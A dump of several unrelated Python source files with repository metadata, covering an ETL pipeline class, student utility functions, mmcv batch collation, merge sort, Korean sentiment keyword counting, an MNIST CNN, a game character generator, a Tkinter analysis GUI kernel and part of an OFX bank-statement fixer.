ind = tf.argsort(scores, direction='ASCENDING')
elif tf.equal(order, 'test'):
ords = tf.concat([[0,6,1,4,7,3,2,5], tf.range(8, n)], axis=0)
ind = tf.tile(ords[tf.newaxis], [b, 1])
else: # corresponds to left-to-right
ind = tf.tile(tf.range(n)[tf.newaxis], [b, 1])
return tf.one_hot(ind, n)
|
[
"anonymouscode12345679@gmail.com"
] |
anonymouscode12345679@gmail.com
|
a50971d3565c9ef0c524198dfbe6e7d2b2f6711c
|
2a01ca22001bb0f07a5a6a450188015de6258838
|
/pypelines/pipeline.py
|
ccee51497ee86878c4a7418d28ae7d9bf04d75f0
|
[] |
no_license
|
gacou54/pypelines-etl
|
0d1a1c6052db8fe0bc2058a5c0bdd210a3de50a1
|
3834f8141a130fb5834a2ac529ef4995f1845718
|
refs/heads/main
| 2023-01-12T21:32:52.363007
| 2020-11-02T23:25:55
| 2020-11-02T23:25:55
| 309,442,074
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
from typing import Any, Union
from pypelines.load import Loader
from pypelines.transform import Transformer
class Pipeline:
def __init__(self, data: Any) -> None:
self.data = data
def __or__(self, other: Union[Transformer, Loader]) -> 'Pipeline':
if isinstance(other, Transformer):
self.data = other.func(self.data)
elif isinstance(other, Loader):
other.load(self.data)
else:
raise TypeError(f'Accepted types are Transformer, Filter or Loader. Got {type(other)}.')
return self
@property
def value(self):
return self.data
|
[
"gacou54@gmail.com"
] |
gacou54@gmail.com
|
892891392ffd5a98cea4905d7db7d30e05ca5d79
|
199aeceddce2466d329c628256bb76aec234860a
|
/python/problempack/my_functions.py
|
6dd483e147d7b0303bbdfa04f5e2d99e9f3672e1
|
[] |
no_license
|
jaredivory/COM250
|
5086c2277ff9abde8122503763f1db24248f3a73
|
f2e33f317ad48623f6fb9bd1f9704b0e0f138897
|
refs/heads/master
| 2020-07-24T11:04:30.568596
| 2019-09-14T17:09:41
| 2019-09-14T17:09:41
| 207,902,637
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,786
|
py
|
import datetime, math
def questionBlock(num):
"Creates a block to seperate the questions"
print("########################################################## %d ##########################################################" % num)
def average(lst):
return sum(lst) / len(lst)
def addTax(inital_price, salesTax=.08675):
return ( inital_price * salesTax ) + inital_price
def minsToDays(mins):
return (mins / (60 * 24))
def minsToHr(mins):
return (mins / 60)
def celsiusToFahrenheit(celsius):
return celsius * 9/5 + 32
def compoundInterestAnnual(amtInvested, interest, years):
"Takes principal and interest then computes amount after years"
amtInvested = (amtInvested * interest) + amtInvested
years -= 1
if (years == 0):
return amtInvested
return compoundInterestAnnual(amtInvested, interest, years)
def compoundInterestQuarterly(amtInvested, interest, years):
for i in range(1, 5):
amtInvested = (amtInvested * interest) + amtInvested
years -= 1
if(years == 0):
return amtInvested
return compoundInterestQuarterly(amtInvested, interest, years)
def hhmmssToSeconds(hhmmss):
"Returns seconds from time format HH:MM:SS"
hrs,mins,secs = hhmmss.split(":")
hrs = int(hrs)
mins = int(mins)
secs = int(secs)
secs += hrs*3600 + mins*60
return secs
def secondsSinceVoyagerLaunch():
return datetime.datetime.now().timestamp() - datetime.datetime(1977,9,5,12,56).timestamp()
def averageVelocity(displacement, elapsedTime):
"Takes displacement (meters) and elapsed time (seconds) and returns velocity (m/s)"
return displacement / elapsedTime
def getRadius(squareFeet):
return squareFeet / math.pi
def getCircumference(radius):
return math.pi * 2 * radius
|
[
"ivorj32@mail.sunysuffolk.edu"
] |
ivorj32@mail.sunysuffolk.edu
|
a1a5d2baee6a657f373f20f0a42af77da3bae684
|
793d8a6030e91939e44dd2c010a06fa24262d238
|
/mmcv/parallel/collate.py
|
bf12a11551035e61992af062e382f072c4def075
|
[
"Apache-2.0"
] |
permissive
|
manlinting/mmcv
|
bfdd71136d794268838401e225579688bb6ca64e
|
ae9d3cc41054712ee54940d8657606afef4fc066
|
refs/heads/master
| 2020-04-04T18:54:34.503076
| 2019-09-25T09:21:25
| 2019-09-25T09:21:25
| 156,184,602
| 1
| 0
|
Apache-2.0
| 2018-11-05T08:30:30
| 2018-11-05T08:30:30
| null |
UTF-8
|
Python
| false
| false
| 2,631
|
py
|
import collections
import torch
import torch.nn.functional as F
from torch.utils.data.dataloader import default_collate
from .data_container import DataContainer
def collate(batch, samples_per_gpu=1):
"""Puts each data field into a tensor/DataContainer with outer dimension
batch size.
Extend default_collate to add support for
:type:`~mmcv.parallel.DataContainer`. There are 3 cases.
1. cpu_only = True, e.g., meta data
2. cpu_only = False, stack = True, e.g., images tensors
3. cpu_only = False, stack = False, e.g., gt bboxes
"""
if not isinstance(batch, collections.Sequence):
raise TypeError("{} is not supported.".format(batch.dtype))
if isinstance(batch[0], DataContainer):
assert len(batch) % samples_per_gpu == 0
stacked = []
if batch[0].cpu_only:
for i in range(0, len(batch), samples_per_gpu):
stacked.append(
[sample.data for sample in batch[i:i + samples_per_gpu]])
return DataContainer(
stacked, batch[0].stack, batch[0].padding_value, cpu_only=True)
elif batch[0].stack:
for i in range(0, len(batch), samples_per_gpu):
assert isinstance(batch[i].data, torch.Tensor)
# TODO: handle tensors other than 3d
assert batch[i].dim() == 3
c, h, w = batch[0].size()
for sample in batch[i:i + samples_per_gpu]:
assert c == sample.size(0)
h = max(h, sample.size(1))
w = max(w, sample.size(2))
padded_samples = [
F.pad(
sample.data,
(0, w - sample.size(2), 0, h - sample.size(1)),
value=sample.padding_value)
for sample in batch[i:i + samples_per_gpu]
]
stacked.append(default_collate(padded_samples))
else:
for i in range(0, len(batch), samples_per_gpu):
stacked.append(
[sample.data for sample in batch[i:i + samples_per_gpu]])
return DataContainer(stacked, batch[0].stack, batch[0].padding_value)
elif isinstance(batch[0], collections.Sequence):
transposed = zip(*batch)
return [collate(samples, samples_per_gpu) for samples in transposed]
elif isinstance(batch[0], collections.Mapping):
return {
key: collate([d[key] for d in batch], samples_per_gpu)
for key in batch[0]
}
else:
return default_collate(batch)
|
[
"chenkaidev@gmail.com"
] |
chenkaidev@gmail.com
|
60568d589b90c68d424abfd846ffc728bfe55508
|
cf7ffa061f11d14de372002475e0852d20c7e020
|
/src/scripts/gui/main_kernel.py
|
72879a1dbb6ef152e3f6ffb11f49227080fa9ca4
|
[] |
no_license
|
olonyk/cs4
|
7612a2869d658eb4e487ba96a18875b0116b7810
|
e2f8ad12058460d4647c9de5e357c95a789b01e6
|
refs/heads/master
| 2021-09-06T18:59:19.960656
| 2018-02-10T00:55:13
| 2018-02-10T00:55:13
| 116,160,747
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,493
|
py
|
import json
import sys
import time
from os.path import dirname, isfile, join
from tkinter import Tk
from tkinter.filedialog import askopenfilename, asksaveasfilename
from numpy import (array, asarray, binary_repr, concatenate, delete, int8,
linalg, logical_and, logical_or, ones, shape, zeros)
from scipy.special import binom
from ..processes.bm_wrapper import BM_Wrapper
from .export_kernel import ExportKernel
from .main_gui import MainGUI
from .preview_kernel import PreviewKernel
from .reader_kernel import ReaderKernel
from ..support.widgets import ViewLog
class MainKernel(object):
def __init__(self, args):
if getattr(sys, 'frozen', False):
# We are running in a bundle, figure out the bundle dir.
bundle_dir = sys._MEIPASS
# Redirect stdout and stderr to log behaivour.
stdout_file = join(bundle_dir, "src", "resources", "settings", "stdout.txt")
sys.stdout = open(stdout_file, 'w')
sys.stderr = open(stdout_file, 'w')
# Find the settings file.
self.sfile = join(bundle_dir, "src", "resources", "settings", "settings.json")
else:
# We are running in a normal Python environment.
# Find the settings file.
self.sfile = join(dirname(dirname(dirname(__file__))),
"resources",
"settings",
"settings.json")
# Read settings file
self.settings = json.load(open(self.sfile))
# Initialize variables
self.data = []
self.header = []
self.age = []
self.sex = []
self.ffan = {}
self.row_map = []
self.result_table = []
self.app = None
# Create the GUI
self.root = Tk()
self.root.title("CS4")
self.root.minsize(width = 600, height = 600)
self.app = MainGUI(self.root, self)
def run(self):
print("Main Kernel running")
while True:
try:
self.root.mainloop()
break
except UnicodeDecodeError:
pass
self.root.destroy()
def cmd_import(self, *args):
print("CMD import")
file_name = askopenfilename()
if file_name:
ReaderKernel(self, file_name)
self.row_map = ones(len(self.data))
self.update_overview()
self.default_settings()
def cmd_view_log(self, *args):
print("CMD view log")
args = ()
ViewLog()
def default_settings(self, app=None):
if not app:
app=self.app
if self.age:
app.settings["min_age"].set(str(min(self.age)))
app.settings["max_age"].set(str(max(self.age)))
else:
try:
app.settings["min_age"].set("N/A")
app.settings["max_age"].set("N/A")
except:
pass
if self.sex:
app.settings["sex"].set(" ".join([str(x) for x in list(set(self.sex))]))
else:
app.settings["sex"].set("N/A")
if self.ffan:
app.settings["ffan_list"] = self.ffan.keys()
app.update_ffan()
def update_overview(self):
if self.header:
self.app.build_overview(self.data, self.header)
def cmd_export(self):
print("CMD export")
if self.result_table:
file_name = asksaveasfilename(defaultextension=".xlsx")
if file_name is None: # asksaveasfile return `None` if dialog closed with "cancel".
return
ExportKernel(self, self.result_table, file_name)
def cmd_execute(self):
print("CMD execute")
if self.app.col_map:
data = array(self.data)
data = delete(data, [i for i, col in enumerate(self.app.col_map) if not col], axis=1)
if hasattr(self.row_map, "shape"):
data = delete(data, [i for i, row in enumerate(self.row_map) if not row], axis=0)
print("shape(data):", shape(data))
# Bad settings
if int(self.app.settings["max_clust"].get()) == 0 or not shape(data)[1]:
return
meta_data = {"pos_val":self.get_vals(self.app.settings["pos_val"]),
"neg_val":self.get_vals(self.app.settings["neg_val"]),
"max_clust":int(self.app.settings["max_clust"].get()),
"min_clust":int(self.app.settings["min_clust"].get()),
"min_age":self.app.settings["min_age"].get(),
"max_age":self.app.settings["max_age"].get(),
"sex":self.app.settings["sex"].get(),
"ffan":self.app.settings["ffan_var"].get()}
pos_val = self.get_vals(self.app.settings["pos_val"])
neg_val = self.get_vals(self.app.settings["neg_val"])
print(meta_data)
max_clust = int(self.app.settings["max_clust"].get())
startTime = time.time()
result_dictionary = BM_Wrapper().analyse(max_cluster=max_clust,
data=data,
pos_map=pos_val,
neg_map=neg_val)
elapsedTime = time.time() - startTime
print("Elapsed time:", elapsedTime)
meta_data["elapsedTime"] = self.to_str_time(elapsedTime, times=2)
self.settings["exe_time"].append([int(self.app.info_text[1].get()), elapsedTime])
self.save_settings()
self.update_info()
self.result_table = self.get_res_table(result_dictionary)
PreviewKernel(self.result_table, meta_data)
def get_res_table(self, result_dictionary):
sco_vec = result_dictionary["score_vec"]
pat_vec = result_dictionary["pattern_vec"]
pos_vec = result_dictionary["pos_vec"]
neg_vec = result_dictionary["neg_vec"]
header = [h for h, c in zip(self.header, self.app.col_map) if c]
# First row with headers
cols = len(header)
styles = []
for pattern in pat_vec:
col_pattern = self._bin_array(int(pattern), cols)
row_s = []
for i, col in enumerate(col_pattern):
if col:
row_s.append(header[i])
styles.append(row_s)
result_table = [[""]*(len(header)+1) for x in range(len(header)+4)]
for i, row in enumerate(result_table):
if i == 0:
for j, _ in enumerate(row):
if not j == 0:
result_table[i][j] = j
elif i == len(header)+1:
for j, _ in enumerate(row):
if j == 0:
result_table[i][j] = "+"
else:
try:
result_table[i][j] = int(pos_vec[j-1])
except OverflowError:
result_table[0][j] = ""
elif i == len(header)+2:
for j, _ in enumerate(row):
if j == 0:
result_table[i][j] = "-"
else:
try:
result_table[i][j] = int(neg_vec[j-1])
except OverflowError:
pass
elif i == len(header)+3:
for j, _ in enumerate(row):
if j == 0:
result_table[i][j] = "Total"
else:
try:
result_table[i][j] = int(sco_vec[j-1])
except OverflowError:
pass
else:
for j, style in enumerate(styles):
if len(style) > i-1:
result_table[i][j+1] = style[i-1]
return result_table
def get_vals(self, val_str_var):
return [int(s) for s in val_str_var.get() if s.isdigit()]
def save_settings(self):
# Save the updated settings file.
with open(self.sfile, 'w') as jsonfile:
json.dump(self.settings, jsonfile)
def cmd_max_cluster_updated(self, *args):
print("CMD max_cluster_updated")
if self.app.settings["max_clust"].get():
val = self.app.settings["max_clust"].get()
try:
if int(val) > sum(self.app.col_map):
self.app.settings["max_clust"].set(str(sum(self.app.col_map)))
except ValueError:
self.app.settings["max_clust"].set(str(sum(self.app.col_map)))
self.update_info()
def cmd_min_cluster_updated(self, *args):
print("CMD min_cluster_updated")
if self.app.settings["min_clust"].get():
val = self.app.settings["min_clust"].get()
try:
if int(val) > int(self.app.settings["max_clust"].get()):
self.app.settings["min_clust"].set(self.app.settings["max_clust"].get())
except ValueError:
self.app.settings["max_clust"].set("1")
self.update_info()
def get_age_filter(self):
age_bitmap = ones(len(self.data))
if self.age:
try:
min_age = int(self.app.settings["min_age"].get())
max_age = int(self.app.settings["max_age"].get())
age_bitmap = logical_and(array(self.age) >= min_age,
array(self.age) <= max_age)
except ValueError:
pass
elif self.app:
self.app.settings["min_age"].set("N/A")
self.app.settings["max_age"].set("N/A")
return age_bitmap
def get_sex_filter(self):
if self.sex:
try:
sex_bitmap = zeros(len(self.data))
sexes = self.get_vals(self.app.settings["sex"])
for sex in sexes:
sex_bitmap = logical_or(sex_bitmap,
array(self.sex) == sex)
return sex_bitmap
except ValueError:
pass
elif self.app:
self.app.settings["sex"].set("N/A")
return ones(len(self.data))
def cmd_age_updated(self, *args):
print("CMD cmd_age_updated")
age_bitmap = self.get_age_filter()
sex_bitmap = self.get_sex_filter()
fan_bitmap = self.get_fan_filter()
self.row_map = logical_and(age_bitmap, sex_bitmap)
self.row_map = logical_and(self.row_map, fan_bitmap)
if self.app:
self.update_info()
def get_fan_filter(self):
fan_bitmap = ones(len(self.data))
if self.ffan:
fan_string = self.app.settings["ffan_var"].get()
if fan_string == "All" or fan_string == "":
fan_bitmap = ones(len(self.data))
else:
fan_bitmap = asarray(self.ffan[fan_string])
return fan_bitmap
def cmd_quit(self):
print("CMD quit")
self.root.destroy()
def update_info(self):
if self.app.col_map:
nr_cols = sum(self.app.col_map)
# Update number of columns
self.app.info_text[0].set(str(nr_cols))
# Update number of combination to check
combs = 0
for i in range(1, int(self.app.settings["max_clust"].get())+1):
combs += binom(sum(self.app.col_map), i)
self.app.info_text[1].set(str(int(combs)))
# Update number of participants
self.app.info_text[2].set("{:d}".format(int(sum(self.row_map))))
# Update estimated time using linear interpolation
dat = array(self.settings["exe_time"])
#def lin_extrapolate(self, x, y, point):
exe_times = self.lin_extrapolate(dat[:,0], dat[:,1], combs)[0]
str_time = self.to_str_time(exe_times, times=2)
self.app.info_text[3].set(str_time)
def to_str_time(self, seconds, times=1):
if seconds < 0:
return "Very fast"
intervals = (
('weeks', 604800), # 60 * 60 * 24 * 7
('days', 86400), # 60 * 60 * 24
('hours', 3600), # 60 * 60
('minutes', 60),
('seconds', 1),
)
result = []
ts = 0
for name, count in intervals:
value = seconds // count
if value:
seconds -= value * count
if value == 1:
name = name.rstrip('s')
result.append("{} {}".format(int(value), name))
ts += 1
if ts >= times:
break
if not result:
return "{:0.2f}s".format(seconds)
return ', '.join(result[:])
def lin_extrapolate(self, x, y, point):
x = array([x])
x = concatenate((x, ones(shape(x))), axis=0).T
y = array([y]).T
m, c = linalg.lstsq(x, y)[0]
return m*point + c
def _bin_array(self, num, m):
"""Convert a positive integer num into an m-bit bit vector
"""
return array(list(binary_repr(num).zfill(m))).astype(int8)
|
[
"olov.nykvist@lybe.se"
] |
olov.nykvist@lybe.se
|
70beeacc3ecefbd7c0c2f749a8512c7a21f26725
|
5a8543c4739e7c7d7db3b2712f07e345cc24bc88
|
/merge_sort.py
|
e35fe503745602aff2004a323f39a59e9bdadaf4
|
[] |
no_license
|
thesmitpatel/Algorithm
|
d50b8f43c7d109ad0710505c5071003468b5d276
|
54c473be3245fa5fa455a0f310eccacbff5dfbe3
|
refs/heads/master
| 2022-12-29T19:19:07.474562
| 2020-10-22T05:55:18
| 2020-10-22T05:55:18
| 306,227,169
| 0
| 1
| null | 2020-10-22T05:55:19
| 2020-10-22T04:59:21
|
Python
|
UTF-8
|
Python
| false
| false
| 747
|
py
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
#python program to illustrate the merge sort algorithm
def mergesort(list1):
n=len(list1)
if(n>1):
mid=n//2
l=list1[:mid]
r=list1[mid:]
mergesort(l)
mergesort(r)
i=j=k=0
while(i<len(l) and j<len(r)):
if(l[i]<r[j]):
list1[k]=l[i]
i+=1
else:
list1[k]=r[j]
j+=1
k+=1
while(i<len(l)):
list1[k]=l[i]
i+=1
k+=1
while(j<len(r)):
list1[k]=r[j]
j+=1
k+=1
return list1
list1=[int(x) for x in input().split()]
print(mergesort(list1))
# In[ ]:
|
[
"61879629+thesmitpatel@users.noreply.github.com"
] |
61879629+thesmitpatel@users.noreply.github.com
|
0c4672ce565c2e2d0af1584bc8f02e08bb128b9c
|
79c184b90f3bc8fb33042061d66ecabfc5c7a79c
|
/progress/1123_mg.py
|
1603842288ec6d91f55d5c0c607777a009c6bd14
|
[
"Apache-2.0"
] |
permissive
|
seawavve/CSR
|
bc11ff242a6fdbc3823154ccb1dc1a949d030e73
|
66bfed8a1585c252e6b00c9fee36db7f3a4ba30a
|
refs/heads/main
| 2023-02-03T15:55:07.677278
| 2020-12-20T08:46:22
| 2020-12-20T08:46:22
| 308,579,516
| 2
| 1
| null | 2020-12-20T08:42:35
| 2020-10-30T09:14:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,083
|
py
|
from konlpy.tag import Okt
okt=Okt()
##추가 코드 Histogram
Hist = lex2.copy()
Hist['Frequency'] = 0
res=[0,0,0] #Positive,Negative,Moderative
pre_texts=[] #다음 감정 학습을 위해 2차원 배열로 전처리된 형태소를 보관
for i in range(len(dataset)): # 이거 잘 돌아가는지 확인 못함 안되면 range(len(dataset)) or range(20)이렇게 바꿔
text=''
text=dataset.loc[i,'본문']
pre_text=okt.morphs(text) #형태소로 자르기
pre_texts.append(pre_text)
pos=0
neg=0
for j in range(len(pre_text)): #형태소가 사전과 일치하고 긍부정 중 1이 있으면 count
for k in range(len(lex2)):
if pre_text[j]==str(lex2.index[k]):
if lex2.iloc[k,0]==1:
pos+=1
if lex2.iloc[k,1]==1:
neg+=1
Hist.iloc[k,2] += 1
if pos>neg:
dataset.loc[i,'pos_neg']=1
res[0]+=1
elif neg>pos:
dataset.loc[i,'pos_neg']=-1
res[1]+=1
else:#중립
dataset.loc[i,'pos_neg']=0
res[2]+=1
print(res)
# 키워드 히스토그램 추출
Valid_Hist_cheack = Hist['Frequency'] > 1
Valid_Hist = Hist[Valid_Hist_cheack ]
Valid_Hist = Valid_Hist.sort_values(by='Frequency',ascending=False)
Positive_Hist_cheack = Valid_Hist['Positive'] == 1
Negative_Hist_cheack = Valid_Hist['Negative'] == 1
Positive_Hist = Valid_Hist[Positive_Hist_cheack]
Negative_Hist = Valid_Hist[Negative_Hist_cheack]
Moderative_Hist = Valid_Hist[ ~Positive_Hist_cheack & ~Negative_Hist_cheack]
Positive_Hist = Positive_Hist.sort_values(by='Frequency',ascending=False)
Negative_Hist = Negative_Hist.sort_values(by='Frequency',ascending=False)
Moderative_Hist = Moderative_Hist.sort_values(by='Frequency',ascending=False)
Valid_Hist.to_csv("Keyword.csv", mode='w',encoding='utf-8')
Positive_Hist.to_csv("Positive_Keyword.csv", mode='w',encoding='utf-8')
Negative_Hist.to_csv("Negative_Keyword.csv", mode='w',encoding='utf-8')
Moderative_Hist.to_csv("Moderative_Keyword.csv", mode='w',encoding='utf-8')
|
[
"noreply@github.com"
] |
seawavve.noreply@github.com
|
c3236541b8c6d111e19c617df2668068d9984f64
|
0123e2f200d3c6a383bb21625147f4e3bfafed27
|
/CNN-MNIST.py
|
1656c5f81795a51ea2e5c59b81f6f086f3012169
|
[] |
no_license
|
KingBigHandsome/Pycharm_DeepLearning
|
1aa6c7f6db681be1d06ee655a3bf9c651b58bbc6
|
70936848fdf43dc7b8f6b9913af251b5c35ab4aa
|
refs/heads/master
| 2020-03-24T12:25:11.929305
| 2018-07-28T22:42:37
| 2018-07-28T22:42:37
| 142,713,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,539
|
py
|
import os
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# In[2]:
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
# Parameters summaries
def variable_summaries(var):
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def weight_variable(shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=name)
def bias_variable(shape, name):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=name)
def conv2d(x, W):
# x input tensor of shape `[batch, in_height, in_width, in_channels]`
# W filter / kernel tensor of shape [filter_height, filter_width, in_channels, out_channels]
# padding: A `string` from: `"SAME", "VALID"`
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
# ksize [1,x,y,1]
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('input'):
x = tf.placeholder(tf.float32, [None, 784], name='x_input')
y = tf.placeholder(tf.float32, [None, 10], name='y_input')
with tf.name_scope('x_image'):
x_image = tf.reshape(x, [-1, 28, 28, 1], name='x_image')
with tf.name_scope('Conv1'):
with tf.name_scope('W_conv1'):
W_conv1 = weight_variable([5, 5, 1, 32], name='W_conv1')
with tf.name_scope('b_conv1'):
b_conv1 = bias_variable([32], name='b_conv1')
with tf.name_scope('conv2d_1'):
conv2d_1 = conv2d(x_image, W_conv1) + b_conv1
with tf.name_scope('relu'):
h_conv1 = tf.nn.relu(conv2d_1)
with tf.name_scope('h_pool1'):
h_pool1 = max_pool_2x2(h_conv1)
with tf.name_scope('Conv2'):
with tf.name_scope('W_conv2'):
W_conv2 = weight_variable([5, 5, 32, 64], name='W_conv2')
with tf.name_scope('b_conv2'):
b_conv2 = bias_variable([64], name='b_conv2')
with tf.name_scope('conv2d_2'):
conv2d_2 = conv2d(h_pool1, W_conv2) + b_conv2
with tf.name_scope('relu'):
h_conv2 = tf.nn.relu(conv2d_2)
with tf.name_scope('h_pool2'):
h_pool2 = max_pool_2x2(h_conv2)
with tf.name_scope('fc1'):
with tf.name_scope('W_fc1'):
W_fc1 = weight_variable([7 * 7 * 64, 1024], name='W_fc1')
with tf.name_scope('b_fc1'):
b_fc1 = bias_variable([1024], name='b_fc1')
with tf.name_scope('h_pool2_flat'):
h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64], name='h_pool2_flat')
with tf.name_scope('wx_plus_b1'):
wx_plus_b1 = tf.matmul(h_pool2_flat, W_fc1) + b_fc1
with tf.name_scope('relu'):
h_fc1 = tf.nn.relu(wx_plus_b1)
with tf.name_scope('keep_prob'):
keep_prob = tf.placeholder(tf.float32, name='keep_prob')
with tf.name_scope('h_fc1_drop'):
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob, name='h_fc1_drop')
with tf.name_scope('fc2'):
with tf.name_scope('W_fc2'):
W_fc2 = weight_variable([1024, 10], name='W_fc2')
with tf.name_scope('b_fc2'):
b_fc2 = bias_variable([10], name='b_fc2')
with tf.name_scope('wx_plus_b2'):
wx_plus_b2 = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
with tf.name_scope('softmax'):
prediction = tf.nn.softmax(wx_plus_b2)
with tf.name_scope('cross_entropy'):
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=prediction),
name='cross_entropy')
tf.summary.scalar('cross_entropy', cross_entropy)
with tf.name_scope('train'):
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
correct_prediction = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
merged = tf.summary.merge_all()
batch_size = 100
n_batch = 2000
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
train_writer = tf.summary.FileWriter('logs/train', sess.graph)
test_writer = tf.summary.FileWriter('logs/test', sess.graph)
for i in range(2000):
batch_xs, batch_ys = mnist.train.next_batch(100)
sess.run(train_step, feed_dict={x: batch_xs, y: batch_ys, keep_prob: 0.6})
summary = sess.run(merged, feed_dict={x: batch_xs, y: batch_ys, keep_prob: 1.0})
train_writer.add_summary(summary, i)
batch_xs, batch_ys = mnist.test.next_batch(100)
summary = sess.run(merged, feed_dict={x: batch_xs, y: batch_ys, keep_prob: 1.0})
test_writer.add_summary(summary, i)
if (i+1) % 100 == 0:
test_acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels, keep_prob: 1.0})
train_acc = sess.run(accuracy, feed_dict={x: mnist.train.images[:10000], y: mnist.train.labels[:10000],
keep_prob: 1.0})
print("Iter " + str(i) + ", Testing Accuracy= " + str(test_acc) + ", Training Accuracy= " + str(train_acc))
|
[
"wdshc@cau.edu.cn"
] |
wdshc@cau.edu.cn
|
c677ade5d5ab6de4167fc9d19c119cf0a810f5f5
|
33d8d8c7efc35c02fdb17f62a712a6981cc7814f
|
/PYTB1L2PlayerStatistcs.py
|
f9ae1d9986098d9d648e3bdc4dc106e72e0d0594
|
[] |
no_license
|
ryan075/PythonAchievements
|
765ca0289a1d43bc35254e9f3dc8fce0f5197c55
|
631fcf268f41118755ac39b123a287f45cf698b8
|
refs/heads/master
| 2022-12-30T18:39:53.916061
| 2020-10-21T12:33:38
| 2020-10-21T12:33:38
| 296,023,111
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,119
|
py
|
print("Vul je IGN in.")
naam = input()
print("IGN: " + " " + naam)
print("Leeftijd Character:")
age = input()
print("Dus " + naam +" is " + age)
print('Gender:')
geslacht = input()
from random import randint
speed = randint(15,20)
strength = randint(10,20)
hp = randint(150,350)
Height = randint(150,220)
import random
weapon = ['Sword', 'Spear' ,'Knife','Bow','Fist']
element = ['Fire','Water','Earth','Lightning','Wind']
playstyle = ['Defense','Offense','Passive']
Behaivior = ['Sad','Mad','Happy','Scared','Disgust']
travel = ['Horse','By Feet']
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print('Character Info:')
print(' ')
print('Name ' + naam)
print('Gender ' + geslacht)
print('Age: ' + age)
print('Height: '+ str(Height) +'CM')
print(' ')
print(' ')
print('Game Stats:')
print('HP: ' + str(hp))
print('Element: ' + random.choice(element))
print("Weapon: ", random.choice(weapon))
print('Speed: ' + str(speed))
print('Strength: ' + str(strength))
print('PlayStyle: '+ random.choice(playstyle))
print('Emotions: '+ random.choice(Behaivior))
print('Trasport: '+ random.choice(travel))
|
[
"apple@MacBook-Pro.local"
] |
apple@MacBook-Pro.local
|
24fa7afed3309d21bdc6e5f02a1291371f741dac
|
4441b6cbbf0ec8b694ffddaf7d591f3a6fa12adb
|
/src/ofx_bp_fix.py
|
71a9d8b75db06552627bc8012876cc3297a4f8f7
|
[] |
no_license
|
jonathand131/OFX-bp-fix
|
75aad875ab04214d6126c0db25444d64ad9c34a5
|
8bd057c7a18aad8cb35146e22014e8c3493a7170
|
refs/heads/master
| 2021-01-20T19:56:36.732427
| 2016-06-03T11:44:36
| 2016-06-03T11:44:36
| 60,335,589
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,154
|
py
|
# coding=utf-8
"""
OFX BP Fix
Fix OFX files produced by the french bank Banque Populaire for proper import in Skrooge
"""
import os.path
import re
import sys
from ofxparse import ofxutil
from const_bp import BP_ATM, BP_CHECK, BP_COMM, BP_IXFER, BP_LOAN, BP_SEPA, BP_SUBSCRIPTION, \
BP_XFER_LONG, BP_XFER_SHORT
from const_ofx import OFX_SRVCHG, OFX_XFER, OFX_DEP, OFX_REPEATPMT, OFX_CHECK, OFX_ATM, OFX_PAYMENT, OFX_DEBIT
# Prepare regexp
RE_TYPE_IN_NAME = re.compile(
r'(?P<type>' + '|'.join((
BP_SUBSCRIPTION,
BP_XFER_SHORT,
BP_XFER_LONG,
BP_IXFER,
BP_SEPA,
BP_CHECK,
BP_ATM,
BP_COMM
)) + r')($| (?P<name>.*))')
RE_CC_CL_TRANSACTION = re.compile(r'(?P<date>\d{6}) (?P<type>CB|SC):?\*\d{9}( (?P<name>.*))?')
RE_TRANSFER_MEMO = re.compile(r'(?P<id>\d{8})($| (?P<memo>.*))')
RE_CHECK_DEPOSIT = re.compile(r'DE \s*\d* CHEQUE\(S\)')
def fix_transaction_type_from_name(transac, stmttrnrs):
"""Fix transac type from name start"""
match_type_in_name = RE_TYPE_IN_NAME.match(transac.name.data)
if match_type_in_name:
transac.trntype.data = {
BP_SUBSCRIPTION: OFX_SRVCHG,
BP_XFER_SHORT: OFX_XFER,
BP_XFER_LONG: OFX_XFER,
BP_IXFER: OFX_DEP,
BP_SEPA: OFX_REPEATPMT,
BP_CHECK: OFX_CHECK,
BP_ATM: OFX_ATM,
BP_COMM: OFX_SRVCHG,
}.get(match_type_in_name.group('type'), transac.trntype.data)
if match_type_in_name.group('name'):
transac.name.data = match_type_in_name.group('name')
if match_type_in_name.group('type') == BP_COMM:
fix_commission(transac, stmttrnrs)
def fix_commission(transac, stmttrnrs):
"""Fix COMMISSION"""
match_cb_sc_transaction = RE_CC_CL_TRANSACTION.match(transac.memo.data)
if match_cb_sc_transaction:
transac.name.data = match_cb_sc_transaction.group('name')
